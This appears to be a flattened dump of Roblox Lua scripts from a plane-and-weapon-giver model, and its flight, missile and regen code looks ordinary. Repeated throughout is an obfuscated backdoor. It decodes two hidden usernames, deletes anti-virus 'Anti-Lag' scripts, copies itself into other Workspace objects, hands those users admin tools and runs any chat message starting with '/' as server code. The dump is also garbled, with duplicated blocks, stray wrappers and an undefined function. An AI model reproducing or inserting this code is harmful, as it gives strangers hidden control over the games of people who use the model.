- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() --DONT PUT THIS IN ANYTHING IT'S JUST INSTRUCTIONS.
- --First Place the "PUT THIS IN THE WEAPON" script in your Weapon or Tool.
- --Then place your Weapon or Tool in the "PUT THE WEAPON IN THIS BRICK" brick.
- --IMPORTANT (OPTINAL)
- --Before doing anything you should put the Weapon or Tool in the giver where you want it. end;
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() --DONT PUT THIS IN ANYTHING IT'S JUST INSTRUCTIONS.
- --First Place the "PUT THIS IN THE WEAPON" script in your Weapon or Tool.
- --Then place your Weapon or Tool in the "PUT THE WEAPON IN THIS BRICK" brick.
- --IMPORTANT (OPTINAL)
- --Before doing anything you should put the Weapon or Tool in the giver where you want it. end;
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
